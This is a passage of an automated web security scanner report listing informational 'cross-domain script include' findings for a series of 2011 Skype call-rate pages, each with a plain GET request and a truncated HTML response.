Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-faroe-islands

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-faroe-islands HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.698. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-fiji  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-fiji

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-fiji HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.699. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-finland  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-finland

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-finland HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:51 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.700. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-france  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-france

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-france HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:21 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.701. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-french-guiana  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-french-guiana

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-french-guiana HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:51 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.702. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-french-polynesia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-french-polynesia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-french-polynesia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:51 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.703. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gabon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-gabon

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-gabon HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:52 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.704. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gambia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-gambia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-gambia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:52 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.705. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-georgia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-georgia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-georgia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:53 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.706. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-germany  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-germany

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-germany HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:22 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 50078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.707. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ghana  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-ghana

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-ghana HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:53 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.708. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gibraltar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-gibraltar

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-gibraltar HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:53 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.709. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-greece  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-greece

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-greece HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:22 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.710. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-greenland  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-greenland

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-greenland HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:54 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.711. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-grenada  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-grenada

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-grenada HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:54 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.712. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guadeloupe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-guadeloupe

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-guadeloupe HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:54 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
